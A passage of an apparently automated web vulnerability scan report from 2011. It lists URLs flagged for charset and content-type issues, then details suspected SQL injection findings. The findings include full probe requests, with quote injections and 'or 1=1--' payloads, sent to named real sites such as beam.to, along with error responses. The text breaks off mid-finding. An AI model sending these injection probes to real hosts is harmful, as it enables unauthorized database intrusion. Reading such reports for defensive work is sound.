29.272. http://www.sheishairy.com/favicon.ico

29.273. http://www.shoppinglifestyle.com/favicon.ico

29.274. http://www.sibcycline.com/favicon.ico

29.275. http://www.silobreaker.com/favicon.ico

29.276. http://www.sinclairinstitute.com/favicon.ico

29.277. http://www.sitewit.com/favicon.ico

29.278. http://www.slb.com/favicon.ico

29.279. http://www.socialdiligence.com/favicon.ico

29.280. http://www.soloqueens.com/favicon.ico

29.281. http://www.sonichealthcareusa.com/favicon.ico

29.282. http://www.speeddateunsub.com/favicon.ico

29.283. http://www.ssssssssss.in/favicon.ico

29.284. http://www.startexpower.com/favicon.ico

29.285. http://www.stoplosspay.army.mil/favicon.ico

29.286. http://www.stratfordfestival.ca/favicon.ico

29.287. http://www.strausnews.com/favicon.ico

29.288. http://www.systweak.com/favicon.ico

29.289. http://www.tabletpcreview.com/favicon.ico

29.290. http://www.taragana.com/favicon.ico

29.291. http://www.teen-college-girls.com/favicon.ico

29.292. http://www.thegrocerygame.com/favicon.ico

29.293. http://www.thegroveataltaridge.com/favicon.ico

29.294. http://www.therapeuticresearch.com/favicon.ico

29.295. http://www.thetinytube.com/favicon.ico

29.296. http://www.ticketseating.com/favicon.ico

29.297. http://www.tiresontherun.com/favicon.ico

29.298. http://www.toyotaopinion.com/favicon.ico

29.299. http://www.traffone.cn/favicon.ico

29.300. http://www.treetop.com/favicon.ico

29.301. http://www.tripplite.com/favicon.ico

29.302. http://www.tunewiki.com/favicon.ico

29.303. http://www.twiztv.com/favicon.ico

29.304. http://www.urheencorser.com/favicon.ico

29.305. http://www.utne.com/favicon.ico

29.306. http://www.uwgb.edu/favicon.ico

29.307. http://www.vagazette.com/favicon.ico

29.308. http://www.vegasview.com/favicon.ico

29.309. http://www.vh1classic.com/favicon.ico

29.310. http://www.viewmylisting.com/favicon.ico

29.311. http://www.vintage-toys.biz/favicon.ico

29.312. http://www.wachoviadealer.com/favicon.ico

29.313. http://www.warehouseskateboards.com/favicon.ico

29.314. http://www.wcvirtualversion.com/favicon.ico

29.315. http://www.webcam-fun.org/favicon.ico

29.316. http://www.webgreeter.com/favicon.ico

29.317. http://www.webindia123.com/favicon.ico

29.318. http://www.wharfyouth.org/favicon.ico

29.319. http://www.wherethelocalseat.com/favicon.ico

29.320. http://www.whosaliveandwhosdead.com/favicon.ico

29.321. http://www.winsornewton.com/favicon.ico

29.322. http://www.winwithpaperless.com/favicon.ico

29.323. http://www.wjr.com/favicon.ico

29.324. http://www.worden.com/favicon.ico

29.325. http://www.worldsoffun.com/favicon.ico

29.326. http://www.wpr.org/favicon.ico

29.327. http://www.writeaprisoner.com/favicon.ico

29.328. http://www.xftvgirls.com/favicon.ico

29.329. http://www.xgalx.com/favicon.ico

29.330. http://www.xignite.com/favicon.ico

29.331. http://www.yapchat.com/favicon.ico

29.332. http://www.yellowairplane.com/favicon.ico

29.333. http://www.zgallerie.com/favicon.ico

29.334. http://www.zoneofhairy.com/favicon.ico

29.335. http://www.zumie.com/favicon.ico

30. HTML uses unrecognised charset

30.1. http://www.7k7k.com/favicon.ico

30.2. http://www.china.org.cn/favicon.ico

30.3. http://www.gougou.com/favicon.ico

30.4. http://www.koreatimes.co.kr/favicon.ico

30.5. http://www.kukinews.com/favicon.ico

30.6. http://www.se-t.net/favicon.ico

30.7. http://www.singtao.com/favicon.ico

30.8. http://www.vindictuswiki.com/favicon.ico

31. Content type incorrectly stated

31.1. http://4qinvite.4q.iperceptions.com/1.aspx

31.2. http://4qinvite.4q.iperceptions.com/trackimage.aspx

31.3. http://api.twitter.com/1/statuses/user_timeline.json

31.4. http://intensedebate.com/remoteVisit.php

31.5. http://ping.crowdscience.com/ping.js

31.6. http://s99.mindvalley.us/quantumjumpingcom/media/wp/uploads/2010/08/invisible-anchor1-211x300.jpg

31.7. http://tracking.moon-ray.com/track.php

31.8. http://www.18-yo-teen.com/favicon.ico

31.9. http://www.321chat.com/favicon.ico

31.10. http://www.670kboi.com/favicon.ico

31.11. http://www.6ass9.com/favicon.ico

31.12. http://www.abacus24-7.com/favicon.ico

31.13. http://www.academicinfo.net/favicon.ico

31.14. http://www.activerideshop.com/favicon.ico

31.15. http://www.adasheriff.org/favicon.ico

31.16. http://www.advocatehealth.com/favicon.ico

31.17. http://www.affordablevintagejewelry.com/favicon.ico

31.18. http://www.agilone.com/favicon.ico

31.19. http://www.alarabiya.net/favicon.ico

31.20. http://www.allgame.com/favicon.ico

31.21. http://www.allslotsusa.com/favicon.ico

31.22. http://www.apartmentwiz.com/favicon.ico

31.23. http://www.apogee.net/favicon.ico

31.24. http://www.architecturaldesigns.com/favicon.ico

31.25. http://www.armedservicesjobs.com/favicon.ico

31.26. http://www.ashvillemobilehomes.com/favicon.ico

31.27. http://www.asstatic.com/favicon.ico

31.28. http://www.autoinsurancetips.com/favicon.ico

31.29. http://www.azdventuresbooks.com/favicon.ico

31.30. http://www.azkidsnet.com/favicon.ico

31.31. http://www.bedbathstore.com/favicon.ico

31.32. http://www.bettycrockerstore.com/favicon.ico

31.33. http://www.bigotires.com/favicon.ico

31.34. http://www.biz-stay.com/favicon.ico

31.35. http://www.blackdoctor.org/favicon.ico

31.36. http://www.blackforestdecor.com/favicon.ico

31.37. http://www.bluebeat.com/favicon.ico

31.38. http://www.bollywoodhungama.com/favicon.ico

31.39. http://www.bonati.com/favicon.ico

31.40. http://www.bongotones.com/favicon.ico

31.41. http://www.bootbay.com/favicon.ico

31.42. http://www.brandsmartusa.com/favicon.ico

31.43. http://www.brighamandwomens.org/favicon.ico

31.44. http://www.brisksearch.com/favicon.ico

31.45. http://www.bullguard.com/favicon.ico

31.46. http://www.cabinsforyou.com/favicon.ico

31.47. http://www.cafepress.co.uk/favicon.ico

31.48. http://www.ccc.edu/favicon.ico

31.49. http://www.cedarfair.com/favicon.ico

31.50. http://www.celebsquares.com/favicon.ico

31.51. http://www.chaoticgame.com/favicon.ico

31.52. http://www.chaparral-racing.com/favicon.ico

31.53. http://www.chefsresource.com/favicon.ico

31.54. http://www.cherokee.org/favicon.ico

31.55. http://www.chooseyou.com/favicon.ico

31.56. http://www.churchs.com/favicon.ico

31.57. http://www.cityofmadison.com/favicon.ico

31.58. http://www.cnmnewsnetwork.com/favicon.ico

31.59. http://www.colemanequip.com/favicon.ico

31.60. http://www.comforthouse.com/favicon.ico

31.61. http://www.commtrans.org/favicon.ico

31.62. http://www.concursolutions.com/favicon.ico

31.63. http://www.connectingsingles.com/favicon.ico

31.64. http://www.corvetteguys.com/favicon.ico

31.65. http://www.cosplaymagic.com/favicon.ico

31.66. http://www.craigslist.at/favicon.ico

31.67. http://www.creationsrewards.net/favicon.ico

31.68. http://www.cruiseone.com/favicon.ico

31.69. http://www.csi.edu/favicon.ico

31.70. http://www.curtmfg.com/favicon.ico

31.71. http://www.depositaccounts.com/favicon.ico

31.72. http://www.diesel.com/favicon.ico

31.73. http://www.discountfilterstore.com/favicon.ico

31.74. http://www.dishant.com/favicon.ico

31.75. http://www.easy-poll.com/favicon.ico

31.76. http://www.easyipodtransfer.com/favicon.ico

31.77. http://www.eautorepair.net/favicon.ico

31.78. http://www.efoodsdirect.com/favicon.ico

31.79. http://www.eforcity.com/favicon.ico

31.80. http://www.eftours.com/favicon.ico

31.81. http://www.elitemeet.com/favicon.ico

31.82. http://www.endeavorsuite.com/favicon.ico

31.83. http://www.esa.int/favicon.ico

31.84. http://www.expertclick.com/favicon.ico

31.85. http://www.extrememotorsales.com/favicon.ico

31.86. http://www.extremeskins.com/favicon.ico

31.87. http://www.farmcollector.com/favicon.ico

31.88. http://www.filmsandtv.com/favicon.ico

31.89. http://www.findaproperty.com/favicon.ico

31.90. http://www.flychina.com/favicon.ico

31.91. http://www.freemdeicalin.com/favicon.ico

31.92. http://www.fridgefilters.com/favicon.ico

31.93. http://www.galvestoncruises.com/favicon.ico

31.94. http://www.gbase.com/favicon.ico

31.95. http://www.getpartsonline.com/favicon.ico

31.96. http://www.gibill.com/favicon.ico

31.97. http://www.giga-byte.com/favicon.ico

31.98. http://www.go2web20.net/favicon.ico

31.99. http://www.goldfeverprospecting.com/favicon.ico

31.100. http://www.greatbigsea.com/favicon.ico

31.101. http://www.greatfunnypictures.com/favicon.ico

31.102. http://www.greenoptions.com/favicon.ico

31.103. http://www.greetingsisland.com/favicon.ico

31.104. http://www.guesssms.com/favicon.ico

31.105. http://www.gulfshores.com/favicon.ico

31.106. http://www.healthypets.com/favicon.ico

31.107. http://www.heartdetectives.com/favicon.ico

31.108. http://www.hellohouston.com/favicon.ico

31.109. http://www.hellolosangeles.com/favicon.ico

31.110. http://www.hellolouisville.com/favicon.ico

31.111. http://www.helsinki.fi/favicon.ico

31.112. http://www.hinduwebsite.com/favicon.ico

31.113. http://www.hmshost.com/favicon.ico

31.114. http://www.hoosiertopics.com/favicon.ico

31.115. http://www.humortank.com/favicon.ico

31.116. http://www.iberiabank.com/favicon.ico

31.117. http://www.ihireconstruction.com/favicon.ico

31.118. http://www.ihirelogistics.com/favicon.ico

31.119. http://www.ihs.org/favicon.ico

31.120. http://www.ireland.com/favicon.ico

31.121. http://www.israellycool.com/favicon.ico

31.122. http://www.jlconline.com/favicon.ico

31.123. http://www.jobilephones.com/favicon.ico

31.124. http://www.jonasbrothers.com/favicon.ico

31.125. http://www.kansasworks.com/favicon.ico

31.126. http://www.kgoam810.com/favicon.ico

31.127. http://www.kjmagnetics.com/favicon.ico

31.128. http://www.krcrtv.com/favicon.ico

31.129. http://www.leadrotation.com/favicon.ico

31.130. http://www.learn2grow.com/favicon.ico

31.131. http://www.leeannwomack.com/favicon.ico

31.132. http://www.leggs.com/favicon.ico

31.133. http://www.lionel.com/favicon.ico

31.134. http://www.list-of-companies.org/favicon.ico

31.135. http://www.livedownloader.com/favicon.ico

31.136. http://www.longwood.edu/favicon.ico

31.137. http://www.lunchboxes.com/favicon.ico

31.138. http://www.magiclegs.net/favicon.ico

31.139. http://www.makeuptalk.com/favicon.ico

31.140. http://www.mallseeker.com/favicon.ico

31.141. http://www.marketingallianceassociation.com/favicon.ico

31.142. http://www.mathfactcafe.com/favicon.ico

31.143. http://www.mcagfair.com/favicon.ico

31.144. http://www.mdlinx.com/favicon.ico

31.145. http://www.mediaho.me/favicon.ico

31.146. http://www.metrocast.com/favicon.ico

31.147. http://www.miallstate.com/favicon.ico

31.148. http://www.midmichigan.org/favicon.ico

31.149. http://www.miningjournal.net/favicon.ico

31.150. http://www.minnesotajobnetwork.com/favicon.ico

31.151. http://www.momsupdated.com/favicon.ico

31.152. http://www.monsterscooterparts.com/favicon.ico

31.153. http://www.mouseguns.com/favicon.ico

31.154. http://www.mts.net/favicon.ico

31.155. http://www.mvcc.edu/favicon.ico

31.156. http://www.mypdfsearch.com/favicon.ico

31.157. http://www.mysimplemobile.com/favicon.ico

31.158. http://www.napaprolink.com/favicon.ico

31.159. http://www.nationaltrailersupply.com/favicon.ico

31.160. http://www.nhrmc.org/favicon.ico

31.161. http://www.northwestms.edu/favicon.ico

31.162. http://www.odometer.com/favicon.ico

31.163. http://www.oempcworld.com/favicon.ico

31.164. http://www.officefurniture2go.com/favicon.ico

31.165. http://www.ofree.net/favicon.ico

31.166. http://www.onecallnow.com/favicon.ico

31.167. http://www.onlineincomeflood.com/favicon.ico

31.168. http://www.orb.com/favicon.ico

31.169. http://www.ouc.com/favicon.ico

31.170. http://www.pazsaz.com/favicon.ico

31.171. http://www.pcc.edu/favicon.ico

31.172. http://www.petstore.com/favicon.ico

31.173. http://www.pfchangshomemenu.com/favicon.ico

31.174. http://www.playbillstore.com/favicon.ico

31.175. http://www.pny.com/favicon.ico

31.176. http://www.poolpartsonline.com/favicon.ico

31.177. http://www.popsugar.co.uk/favicon.ico

31.178. http://www.posterrevolution.com/favicon.ico

31.179. http://www.povo.com/favicon.ico

31.180. http://www.preschoolexpress.com/favicon.ico

31.181. http://www.quantumjumping.com/media/images/a/meditation4.png

31.182. http://www.quiltersclubofamerica.com/favicon.ico

31.183. http://www.radiological.com/favicon.ico

31.184. http://www.rajshri.com/favicon.ico

31.185. http://www.reservebranson.com/favicon.ico

31.186. http://www.rmatrackr.com/favicon.ico

31.187. http://www.runningwarehouse.com/favicon.ico

31.188. http://www.saclibrary.org/favicon.ico

31.189. http://www.sanjeevkapoor.com/favicon.ico

31.190. http://www.savvysugar.com/favicon.ico

31.191. http://www.sccommed.org/favicon.ico

31.192. http://www.scjohnson.com/favicon.ico

31.193. http://www.screamindailydeals.com/favicon.ico

31.194. http://www.seaeagle.com/favicon.ico

31.195. http://www.sharenator.org/favicon.ico

31.196. http://www.sibcycline.com/favicon.ico

31.197. http://www.silobreaker.com/favicon.ico

31.198. http://www.sinclairinstitute.com/favicon.ico

31.199. http://www.sitewit.com/favicon.ico

31.200. http://www.slb.com/favicon.ico

31.201. http://www.smsumustangs.com/favicon.ico

31.202. http://www.softlinens.com/favicon.ico

31.203. http://www.startexpower.com/favicon.ico

31.204. http://www.stratfordfestival.ca/favicon.ico

31.205. http://www.systweak.com/favicon.ico

31.206. http://www.tabletpcreview.com/favicon.ico

31.207. http://www.tbd.com/favicon.ico

31.208. http://www.thecompassstore.com/favicon.ico

31.209. http://www.thefreeiqtest.org/favicon.ico

31.210. http://www.thegrocerygame.com/favicon.ico

31.211. http://www.thegroveataltaridge.com/favicon.ico

31.212. http://www.theperfumespot.com/favicon.ico

31.213. http://www.therapeuticresearch.com/favicon.ico

31.214. http://www.thescooterstoreonline.com/favicon.ico

31.215. http://www.ticketseating.com/favicon.ico

31.216. http://www.topoftheline.com/favicon.ico

31.217. http://www.tripplite.com/favicon.ico

31.218. http://www.tsppilot.com/favicon.ico

31.219. http://www.tunewiki.com/favicon.ico

31.220. http://www.tv2.no/favicon.ico

31.221. http://www.uniqlo.com/favicon.ico

31.222. http://www.utne.com/favicon.ico

31.223. http://www.uwgb.edu/favicon.ico

31.224. http://www.vacuumpartstore.com/favicon.ico

31.225. http://www.vegasview.com/favicon.ico

31.226. http://www.viewmylisting.com/favicon.ico

31.227. http://www.wackyplanet.com/favicon.ico

31.228. http://www.webcam-fun.org/favicon.ico

31.229. http://www.webgreeter.com/favicon.ico

31.230. http://www.wellspan.org/favicon.ico

31.231. http://www.wherethelocalseat.com/favicon.ico

31.232. http://www.whosaliveandwhosdead.com/favicon.ico

31.233. http://www.winsornewton.com/favicon.ico

31.234. http://www.winwithpaperless.com/favicon.ico

31.235. http://www.wirelessground.com/favicon.ico

31.236. http://www.wizardworld.com/favicon.ico

31.237. http://www.wjr.com/favicon.ico

31.238. http://www.worden.com/favicon.ico

31.239. http://www.worldsoffun.com/favicon.ico

31.240. http://www.wpr.org/favicon.ico

31.241. http://www.writeaprisoner.com/favicon.ico

31.242. http://www.xftvgirls.com/favicon.ico

31.243. http://www.xignite.com/favicon.ico

31.244. http://www.yapchat.com/favicon.ico

31.245. http://www.zgallerie.com/favicon.ico

31.246. http://www.zumie.com/favicon.ico

32. Content type is not specified

32.1. http://www.actionallstars.com/favicon.ico

32.2. http://www.allergan.com/favicon.ico

32.3. http://www.amex.com/favicon.ico

32.4. http://www.analog.com/favicon.ico

32.5. http://www.animalleague.org/favicon.ico

32.6. http://www.autism-society.org/favicon.ico

32.7. http://www.bizsiteservice.com/favicon.ico

32.8. http://www.burntorangereport.com/favicon.ico

32.9. http://www.drgreene.com/favicon.ico

32.10. http://www.egyptair.com/favicon.ico

32.11. http://www.embark.com/favicon.ico

32.12. http://www.evaphone.com/favicon.ico

32.13. http://www.fluor.com/favicon.ico

32.14. http://www.gemvara.com/favicon.ico

32.15. http://www.greentreepayday.com/favicon.ico

32.16. http://www.homeawayrealestate.com/favicon.ico

32.17. http://www.homegauge.com/favicon.ico

32.18. http://www.hotelguide.com/favicon.ico

32.19. http://www.hrs.com/favicon.ico

32.20. http://www.iccsafe.org/favicon.ico

32.21. http://www.individualhealthquotes.com/favicon.ico

32.22. http://www.jaycfoods.com/favicon.ico

32.23. http://www.kaplan.com/favicon.ico

32.24. http://www.lakecountyil.gov/favicon.ico

32.25. http://www.newholland.com/favicon.ico

32.26. http://www.oge.com/favicon.ico

32.27. http://www.ppg.com/favicon.ico

32.28. http://www.purolatorautofilters.net/favicon.ico

32.29. http://www.rotohog.com/favicon.ico

32.30. http://www.softballsavings.com/favicon.ico

32.31. http://www.southeasttech.edu/favicon.ico

32.32. http://www.statoil.com/favicon.ico

32.33. http://www.tel3advantage.com/favicon.ico

32.34. http://www.thebar.com/favicon.ico

32.35. http://www.tickettoread.com/favicon.ico

32.36. http://www.topsofts.com/favicon.ico

32.37. http://www.ucc.org/favicon.ico

32.38. http://www.usmc-mccs.org/favicon.ico

32.39. http://www.ziploc.com/favicon.ico



1. SQL injection  next
There are 27 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://beam.to/favicon.ico [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://beam.to
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /favicon.ico' HTTP/1.1
Host: beam.to
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSCCAQQAQ=DAJIDBLDJFEMMIDDDPIMKNCN

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Wed, 04 May 2011 02:15:57 GMT
Connection: close
Content-type: text/html

<HTML><HEAD><TITLE>Internal Error</TITLE></HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000" LINK="#0000FF" VLINK="#0000FF">
<H1>Error in /cgi/beam2.exe</H1>
<PRE>ODBC-Aufruf fehlgeschlagen. Error Numbe
...[SNIP]...

Request 2

GET /favicon.ico'' HTTP/1.1
Host: beam.to
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSCCAQQAQ=DAJIDBLDJFEMMIDDDPIMKNCN

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Wed, 04 May 2011 02:16:01 GMT
Connection: close
Content-type: text/html

<HTML><HEAD><TITLE>BEAMTO</TITLE>
<meta http-equiv="Refresh"content="0; URL=http://beam.to/index.asp">
</HEAD><BODY>
</BODY></HTML>

1.2. http://beam.to/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://beam.to
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /favicon.ico?1'=1 HTTP/1.1
Host: beam.to
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSCCAQQAQ=DAJIDBLDJFEMMIDDDPIMKNCN

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Wed, 04 May 2011 02:15:28 GMT
Connection: close
Content-type: text/html

<HTML><HEAD><TITLE>Internal Error</TITLE></HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000" LINK="#0000FF" VLINK="#0000FF">
<H1>Error in /cgi/beam2.exe</H1>
<PRE>ODBC-Aufruf fehlgeschlagen. Error Numbe
...[SNIP]...

Request 2

GET /favicon.ico?1''=1 HTTP/1.1
Host: beam.to
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSCCAQQAQ=DAJIDBLDJFEMMIDDDPIMKNCN

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Wed, 04 May 2011 02:15:29 GMT
Connection: close
Content-type: text/html

<HTML><HEAD><TITLE>BEAMTO</TITLE>
<meta http-equiv="Refresh"content="0; URL=http://beam.to/index.asp">
</HEAD><BODY>
</BODY></HTML>

1.3. http://beam.to/index.asp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://beam.to
Path:   /index.asp

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /index.asp' HTTP/1.1
Host: beam.to
Proxy-Connection: keep-alive
Referer: http://www.beam.to/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Wed, 04 May 2011 02:15:23 GMT
Connection: close
Content-type: text/html

<HTML><HEAD><TITLE>Internal Error</TITLE></HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000" LINK="#0000FF" VLINK="#0000FF">
<H1>Error in /cgi/beam2.exe</H1>
<PRE>ODBC-Aufruf fehlgeschlagen. Error Numbe
...[SNIP]...

Request 2

GET /index.asp'' HTTP/1.1
Host: beam.to
Proxy-Connection: keep-alive
Referer: http://www.beam.to/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Wed, 04 May 2011 02:15:24 GMT
Connection: close
Content-type: text/html

<HTML><HEAD><TITLE>BEAMTO</TITLE>
<meta http-equiv="Refresh"content="0; URL=http://beam.to/index.asp">
</HEAD><BODY>
</BODY></HTML>

1.4. http://beam.to/login.asp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://beam.to
Path:   /login.asp

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /login.asp' HTTP/1.1
Host: beam.to
Proxy-Connection: keep-alive
Referer: http://beam.to/start.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSCCAQQAQ=DAJIDBLDJFEMMIDDDPIMKNCN

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Wed, 04 May 2011 02:15:24 GMT
Connection: close
Content-type: text/html

<HTML><HEAD><TITLE>Internal Error</TITLE></HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000" LINK="#0000FF" VLINK="#0000FF">
<H1>Error in /cgi/beam2.exe</H1>
<PRE>ODBC-Aufruf fehlgeschlagen. Error Numbe
...[SNIP]...

Request 2

GET /login.asp'' HTTP/1.1
Host: beam.to
Proxy-Connection: keep-alive
Referer: http://beam.to/start.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSCCAQQAQ=DAJIDBLDJFEMMIDDDPIMKNCN

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Wed, 04 May 2011 02:15:26 GMT
Connection: close
Content-type: text/html

<HTML><HEAD><TITLE>BEAMTO</TITLE>
<meta http-equiv="Refresh"content="0; URL=http://beam.to/index.asp">
</HEAD><BODY>
</BODY></HTML>

1.5. http://beam.to/start.asp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://beam.to
Path:   /start.asp

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /start.asp' HTTP/1.1
Host: beam.to
Proxy-Connection: keep-alive
Referer: http://www.beam.to/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSCCAQQAQ=DAJIDBLDJFEMMIDDDPIMKNCN

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Wed, 04 May 2011 02:15:17 GMT
Connection: close
Content-type: text/html

<HTML><HEAD><TITLE>Internal Error</TITLE></HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000" LINK="#0000FF" VLINK="#0000FF">
<H1>Error in /cgi/beam2.exe</H1>
<PRE>ODBC-Aufruf fehlgeschlagen. Error Numbe
...[SNIP]...

Request 2

GET /start.asp'' HTTP/1.1
Host: beam.to
Proxy-Connection: keep-alive
Referer: http://www.beam.to/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSCCAQQAQ=DAJIDBLDJFEMMIDDDPIMKNCN

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Wed, 04 May 2011 02:15:18 GMT
Connection: close
Content-type: text/html

<HTML><HEAD><TITLE>BEAMTO</TITLE>
<meta http-equiv="Refresh"content="0; URL=http://beam.to/index.asp">
</HEAD><BODY>
</BODY></HTML>

1.6. http://tracking.moon-ray.com/track.php [s parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tracking.moon-ray.com
Path:   /track.php

Issue detail

The s parameter appears to be vulnerable to SQL injection attacks. The payloads 40656182'%20or%201%3d1--%20 and 40656182'%20or%201%3d2--%20 were each submitted in the s parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

